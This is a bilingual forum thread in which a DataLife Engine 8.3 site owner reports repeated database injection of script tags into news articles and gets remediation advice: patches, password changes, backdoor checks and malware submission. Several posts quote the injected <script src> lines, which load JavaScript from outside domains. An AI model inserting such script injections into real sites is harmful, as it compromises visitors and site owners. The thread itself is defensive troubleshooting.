Hack problem

[geokir 0]

Hello,

I am using DLE 8.3 and I have just discovered that my site was hacked.

Someone has added in every news article the following:

<script src="http://karbjurator.co.cc/s2343492329429342342834example2323123.js" ......</script>

(example of the script added, not the real one)

I cant write my site because you may think I am spamming but I really do have a problem. It seems that someone has find a way to add in every article in my db a text at the end.

Any advice? Changing passwords will help?

Thanks

Giorgos

------------------------------------------------------------

Здравствуйте,

Я использую DLE 8.3 и я только что обнаружил, что мой сайт был взломан.

Кто-то добавил в каждую новость следующие:

<сценария SRC = "http://karbjurator.co.cc/s2343492329429342342834example2323123.js" ......</ сценария>

(пример скрипта добавлена, а не реальная)

Я не могу написать свой сайт, потому что вы можете думать, что я спам, но я действительно есть проблемы. Кажется, что кто-то найти способ добавить в каждую статью в моем дБ текст в конце.

Любые советы? Изменение паролей поможет?

Спасибо

Гиоргос

[celsoft 6 068]

На вашем сайте не установлены патчи безопасности http://dle-news.ru/bags/

[geokir 0]

На вашем сайте не установлены патчи безопасности http://dle-news.ru/bags/

I have just done it, hope it works

many thanks

Giorgos

-----------------

Я только что сделал это, надеюсь, что это работает

большое спасибо

Giorgos

[ya12831 0]

Здравствуйте.

Установлены все патчи безопасности, но не спасает. Подгружается код:

<script src="http://karbjurator.co.cc/859a208b8cf2bce3663dff6bf35030e5.js" type="text/javascript"></script><script src="http://goooogle.ipq.co/0d1e4101b50c8a519c757b0f8c5a6d6f.js" type="text/javascript"></script><script src="http://mygoogle.ce.ms/e09ba8f418c22d54752abcda89d853f3.js" type="text/javascript"></script>

Что делать?

[celsoft 6 068]

МихаилUA,

Так вы его должны удалить из базы данных, то что вы установили патчи, это не уберет данный код из БД, вам же написали персональным сообщением что вам нужно делать.

[WWW.ZEOS.IN 1 161]

МихаилUA, пишите мне в ICQ, почистим Вам базу данных

[geokir 0]

Здравствуйте.

Установлены все патчи безопасности, но не спасает. Подгружается код:

<script src="http://karbjurator.co.cc/859a208b8cf2bce3663dff6bf35030e5.js" type="text/javascript"></script><script src="http://goooogle.ipq.co/0d1e4101b50c8a519c757b0f8c5a6d6f.js" type="text/javascript"></script><script src="http://mygoogle.ce.ms/e09ba8f418c22d54752abcda89d853f3.js" type="text/javascript"></script>

Что делать?

I also still have the same problem. I installed the patches, clean all articles but after 2 days it happened again.

-------------------

Я также по-прежнему имеют те же проблемы. Я установил патчи, очистить все статьи, но через 2 дня это случилось снова.

[celsoft 6 068]

geokir,

Необходимо осматривать ваш сервер на наличие бекдоров в системе, оставленных после первого раза отправьте запрос в службу поддержки http://dle-news.ru/index.php?do=feedback и предоставьте доступ по FTP и к админпанели скрипта.

Также нужно обязательно менять все пароли, в том числе и для БД MySQL потому как после первого раза ваши старые пароли к БД известны и вставляется этот код напрямую в БД, а не через скрипт, т.к. он не позволяет добавление таких кодов, а при прямой вставке БД минуя скрипт, такие коды можно вставить.

[geokir 0]

geokir,

Необходимо осматривать ваш сервер на наличие бекдоров в системе, оставленных после первого раза отправьте запрос в службу поддержки http://dle-news.ru/index.php?do=feedback и предоставьте доступ по FTP и к админпанели скрипта.

Также нужно обязательно менять все пароли, в том числе и для БД MySQL потому как после первого раза ваши старые пароли к БД известны и вставляется этот код напрямую в БД, а не через скрипт, т.к. он не позволяет добавление таких кодов, а при прямой вставке БД минуя скрипт, такие коды можно вставить.

I changed my admin password through my profile and created a new user/password for my MySQL database through Cpanel. I hope it works now, if not I will send you the deatils via http://dle-news.ru/index.php?do=feedback to check for backdoors

-----------------------

Я изменил свой пароль администратора через свой профиль и создал нового пользователя / пароль для моей базы данных MySQL через Cpanel. Я надеюсь, что он работает сейчас, если не Я пошлю к вам deatils через http://dle-news.ru/index.php?do=feedback для проверки бэкдоры

[guusr 19]

Смените вообще все пароли. Проверьте скрипт антивирусом. Просмотрите ручками на наличие левого кода. Гляньте наличие левых администраторов и модераторов. Проверьте типы разрешённых для загрузки файлов. Проверьте все хтассессы.

[Japonec 8]

Отправляйте сразу те скрипты http://support.kaspersky.ru/virlab/helpdesk.html?LANG=ru с выбором Запрос на исследования вэб ресурса

А так же всю бяку что найдёте...это поможет оперативно выявить вредоносный код.

Изменено 23 января 2011 пользователем Japonec

[ya12831 0]

geokir,

Необходимо осматривать ваш сервер на наличие бекдоров в системе, оставленных после первого раза отправьте запрос в службу поддержки http://dle-news.ru/index.php?do=feedback и предоставьте доступ по FTP и к админпанели скрипта.

Также нужно обязательно менять все пароли, в том числе и для БД MySQL потому как после первого раза ваши старые пароли к БД известны и вставляется этот код напрямую в БД, а не через скрипт, т.к. он не позволяет добавление таких кодов, а при прямой вставке БД минуя скрипт, такие коды можно вставить.

Спасибо. Всё разобрался, проблема решена.

[geokir 0]

I did all you have told me. Changed my passwords but today I was attacked again.

<script src="http://topkek.org/c099c5a2900c644ca6ba6c54b9528d30.js" type="text/javascript"></script>

I am desperated. Any help? -------------------------- Я сделал все, что вы мне сказали. Изменен мои пароли, но сегодня я был атакован еще раз.

<script src="http://topkek.org/c099c5a2900c644ca6ba6c54b9528d30.js" type="text/javascript"></script>

Я в отчаянии. Любая помощь?. Любая помощь?

Изменено 29 января 2011 пользователем geokir

[celsoft 6 068]

geokir,

Вам написали что вам делать. Обращайтесь в службу поддержки, предоставляйте доступы по FTP и к админпанели.

[geokir 0]

I am sorry, I can not give access to my account. What other things I have to do to find the problem. I would rather be guided.

------------------

Мне очень жаль, я не могу дать доступ к своему аккаунту. Что еще я должен сделать, чтобы найти проблему. Я предпочел бы руководствоваться.